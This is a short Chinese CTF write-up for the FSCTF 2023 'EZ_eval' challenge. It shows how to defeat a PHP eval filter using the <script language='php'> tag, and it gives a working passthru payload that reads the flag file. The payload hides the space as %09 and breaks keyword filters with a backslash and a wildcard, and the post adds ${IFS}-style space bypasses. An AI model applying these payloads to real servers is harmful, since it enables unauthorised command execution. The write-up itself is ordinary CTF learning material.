[FSCTF 2023]EZ_eval
EZ_evalhttps://img2023.cnblogs.com/blog/3300007/202310/3300007-20231025004940497-2038051612.png
这道题关键就是过滤了?号和空格还有eval执行时用了php的结束标志表示php代码到此为止了,那不行啊我后面的参数还等着被执行呢……
可以用php短标签,有三种方式:
<ol>#前提是开启配置参数short_open_tags=on
<script language="php">echo 'hello';#不需要修改参数开关,但是只能在7.0以下可用。
#开启配置参数asp_tags=on,并且只能在7.0以下版本使用
https://img2023.cnblogs.com/blog/3300007/202310/3300007-20231025004941712-1428589699.png所以用第二种嘛
构造payload:word=passthru("ta\c%09/f*");
用%09绕过空格,其它的我都试了一遍,没绕过
用\绕过tac的限制
*通配符绕过flag的关键字
最后:
https://img2023.cnblogs.com/blog/3300007/202310/3300007-20231025004942419-1760118254.png其它绕过空格的方式:
%20: 在URL编码中,空格通常被表示为 %20。
%09: 水平制表符(Horizontal Tab)的URL编码是 %09。
使用其他字符: 有时你可以使用其他字符来代替空格,例如使用下划线 _ 或连字符 - 来表示空格。
\t
${IFS}
$IFS$1//1这个数字写什么都行好像
页:
[1]